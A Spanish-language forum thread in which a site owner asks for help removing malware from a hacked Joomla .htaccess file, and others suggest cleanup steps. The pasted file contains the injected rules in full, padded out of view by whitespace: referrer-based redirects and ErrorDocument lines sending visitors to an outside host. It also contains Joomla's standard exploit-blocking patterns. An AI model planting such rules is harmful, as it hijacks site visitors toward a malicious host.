Como elimino VIRUS en el htaccess de un joomla ?

juanmanuel · 26 Mar 2012

Bueno he encontrado el VIRUS, esta en el .htaccess ! La macana que la plataforma que tengo es Joomla.
Si alguien me puede ayudar a modificarlo se lo agradeceré. Lo dejo a continuacion:

Insertar CODE, HTML o PHP:

																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://ca-no.ru/example/status.php [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://ca-no.ru/example/status.php [R=301,L]																														
																														</IfModule>																														
																																																												






##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
  Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits
########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects
#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

 RewriteBase /

########## Begin - www redirect Section

RewriteCond %{HTTP_HOST} ^peliculassincortes.com [NC]
########## End - www redirect Section

########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section




















































																																																												
																														ErrorDocument 400 http://ca-no.ru/example/status.php																														
																														ErrorDocument 401 http://ca-no.ru/example/status.php																														
																														ErrorDocument 403 http://ca-no.ru/example/status.php																														
																														ErrorDocument 404 http://ca-no.ru/example/status.php																														
																														ErrorDocument 500 http://ca-no.ru/example/status.php

Facundo · 26 Mar 2012

Esto solo dejá o no ?

##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $# @package Joomla# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.# @license The GNU General Public License v3.0 - GNU Project - Free Software Foundation (FSF) GNU/GPL# Joomla! is Free Software######################################################## READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE## The line just below this section: 'Options +FollowSymLinks' may cause problems# with some server configurations. It is required for use of mod_rewrite, but may already# be set by your server administrator in a way that dissallows changing it in# your .htaccess file. If using it causes your server to error out, comment it out (add # to# beginning of line), reload your site in your browser and test your sef url's. If they work,# it has been set by your server administrator and you do not need it set here.######################################################## Can be commented out if causes errors, see notes above. Options +FollowSymLinks## mod_rewrite in useRewriteEngine On########## Begin - Rewrite rules to block out some common exploits## If you experience problems on your site block out the operations listed below## This attempts to block the most common type of exploit `attempts` to Joomla!### Deny access to extension xml files (uncomment out to activate)#<Files ~ "\.xml$">#Order allow,deny#Deny from all#Satisfy all#</Files>## End of deny access to extension xml files# Block out any script trying to set a mosConfig value through the URLRewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]# Block out any script trying to base64_encode data within the URLRewriteCond %{QUERY_STRING} base64_encode[^(]*$[^)]*$ [OR]# Block out any script that includes a <script> tag in URLRewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]# Block out any script trying to set a PHP GLOBALS variable via URLRewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]# Block out any script trying to modify a _REQUEST variable via URLRewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})# Return 403 Forbidden header and show the content of the root homepageRewriteRule .* index.php [F]########### End - Rewrite rules to block out some common exploits########## Begin - Custom redirects## If you need to redirect some pages, or set a canonical non-www to# www redirect (or vice versa), place that code here. Ensure those# redirects use the correct RewriteRule syntax and the [R=301,L] flags.########### End - Custom redirects# Uncomment following line if your webserver's URL# is not directly related to physical file paths.# Update Your Joomla! Directory (just / for root) RewriteBase /########## Begin - www redirect SectionRewriteCond %{HTTP_HOST} ^peliculassincortes.com [NC]########## End - www redirect Section########## Begin - Joomla! core SEF Section#RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]## If the requested path and file is not /index.php and the request# has not already been internally rewritten to the index.php scriptRewriteCond %{REQUEST_URI} !^/index\.php# and the request is for root, or for an extensionless URL, or the# requested URL ends with one of the listed extensionsRewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]# and the requested path and file doesn't directly match a physical fileRewriteCond %{REQUEST_FILENAME} !-f# and the requested path and file doesn't directly match a physical folderRewriteCond %{REQUEST_FILENAME} !-d# internally rewrite the request to the index.php scriptRewriteRule .* index.php [L]#
########## End - Joomla! core SEF Section

Osea, sacá todo lo que esté arriba y abajo de la sección con muchos ###.

Obviamente, hacé un backup antes por las dudas.

Saludos

juanmanuel · 26 Mar 2012

Facundo dijo:
Esto solo dejá o no ?

Osea, sacá todo lo que esté arriba y abajo de la sección con muchos ###.

Obviamente, hacé un backup antes por las dudas.

Saludos

Hice exactamente eso ... pero no funcó

enrique00 · 26 Mar 2012

No tienes algún backup viejo del sitio? de hace algunos meses? pudieras restaurar el .htaccess de ahí.

jose26 · 26 Mar 2012

Acabo de llegar y voy a dormir, se me ha hecho tarde lo siento. Te he dejado mp

Enviado desde mi GT-I9100 usando Tapatalk

Facundo · 26 Mar 2012

Entonces tenés otro archivo que está modificando tu HTaccess.

Entrá por FTP y ordená los archivos del root por fecha de modificación y repasalos uno por uno. Si es necesario, metete en todas las carpetas y realizá esto.

Mirá todos los archivos a partir de la fecha en donde empezó a andar mal la cosa.

Saludos!

juanmanuel · 26 Mar 2012

Facundo dijo:
Entonces tenés otro archivo que está modificando tu HTaccess.

Entrá por FTP y ordená los archivos del root por fecha de modificación y repasalos uno por uno. Si es necesario, metete en todas las carpetas y realizá esto.

Mirá todos los archivos a partir de la fecha en donde empezó a andar mal la cosa.

Saludos!

ahi me fije .. obviamente los 2 ultimos modificados con el .htaccess y el error_log (EL DIA DE HOY, que fue cuando empezo el problema)
El 3er ultimo modificado es una carpeta que se llama tmp (donde adentro hay un cache)
Y el 4to ultimo modificado es el .ftpquota (que fue hace 2 semanas y contiene 12 numeros. [MENTION=89]Facundo[/MENTION], al modificar el htaccess ... tenes idea si es de " rapida accion " o hay q esperar cierto tiempo ?

[MENTION=1292]enrique00[/MENTION], gracias es muy buena ! Ya me estoy descargando un backup viejo que tenia ...

Facundo · 26 Mar 2012

Te fijaste en los archivos del theme ? En los archivos de Wp-admin ? En los archivos de wp-content en general ?

Tenés que fijarte en todos. Desde los del theme, hasta lo de los plugins, porque en una de esas es algún bug de un plugin.

Los de Wp-admin no tendrían que tener ninguna modificación desde la última vez que actualizaste WP por ejemplo.

juanmanuel · 26 Mar 2012

Facundo dijo:
Te fijaste en los archivos del theme ? En los archivos de Wp-admin ? En los archivos de wp-content en general ?

Tenés que fijarte en todos. Desde los del theme, hasta lo de los plugins, porque en una de esas es algún bug de un plugin.

Los de Wp-admin no tendrían que tener ninguna modificación desde la última vez que actualizaste WP por ejemplo.

Este Zangano del joomla tiene millones de carpetas. Ponele, recien encuentro una en esta ruta /public_html/peliculassincortes.com/cache/plg_content_avreloaded
esa tiene 2 archivos modificados hoy ..... pero es un cache ...

vos me recomendas hacer un backup de lo que tengo ahora y despues eliminar cualquier modificacion de hoy ? Por ejemplo esta .....

Facundo · 26 Mar 2012

Ah, que bolú, me olvidé que era joomla... Y bueno... Tendrás que que hacer todo manual 😀

Empezá a ver en cada carpeta (en este caso, empezá con las carpetas del sistema, la de los complementos y la de los themes).

Si conseguís a alguien que te sepa usar la ventana de comandos de linux, te podría hacer un pequeño script para listar todos los archivos por fecha de modificación.

Salteate de la búsqueda, los archivos log. Después revisá todo.

Saqué de un foro yanki:

sXi you're right - anyway a quick update on the situation.
I removed the tmp/joscore.php file and deleted the .htaccess files in the web root and account root. Then updated joomla to the latest version and the account hasn't been re-infected.

And surely updated ftp/ssh user and db passwords.

For what it's worth - that's my solution so far.

Fijate en ese archivo a ver que tiene.

juanmanuel · 26 Mar 2012

enrique00 dijo:
No tienes algún backup viejo del sitio? de hace algunos meses? pudieras restaurar el .htaccess de ahí.

Quice hacer eso ... el anterior pesa 3.895 y el q tengo infectado pesa 3.812
Pero me tira lo siguiente:

553 Can't open that file: Permission denied
Error: Error crítico de transferencia de fichero

Facundo dijo:
Ah, que bolú, me olvidé que era joomla... Y bueno... Tendrás que que hacer todo manual 😀

Empezá a ver en cada carpeta (en este caso, empezá con las carpetas del sistema, la de los complementos y la de los themes).

Si conseguís a alguien que te sepa usar la ventana de comandos de linux, te podría hacer un pequeño script para listar todos los archivos por fecha de modificación.

Salteate de la búsqueda, los archivos log. Después revisá todo.

Saqué de un foro yanki:

sXi you're right - anyway a quick update on the situation.
I removed the tmp/joscore.php file and deleted the .htaccess files in the web root and account root. Then updated joomla to the latest version and the account hasn't been re-infected.

And surely updated ftp/ssh user and db passwords.

For what it's worth - that's my solution so far.

Fijate en ese archivo a ver que tiene.

Bueno, lo primero lo voy a tener que hacer mañana --- hay millllles de carpetas jajaja
Y lo segundo ... no tengo el archivo joscore.php dentro de la carpeta tmp !

Intente reemplazar el htaccess actual por el viejo .. pero me tiro error critico de transf de archivo

Como elimino VIRUS en el htaccess de un joomla ?

juanmanuel

Facundo

juanmanuel

enrique00

jose26

Facundo

juanmanuel

Facundo

juanmanuel

Facundo

juanmanuel

Temas similares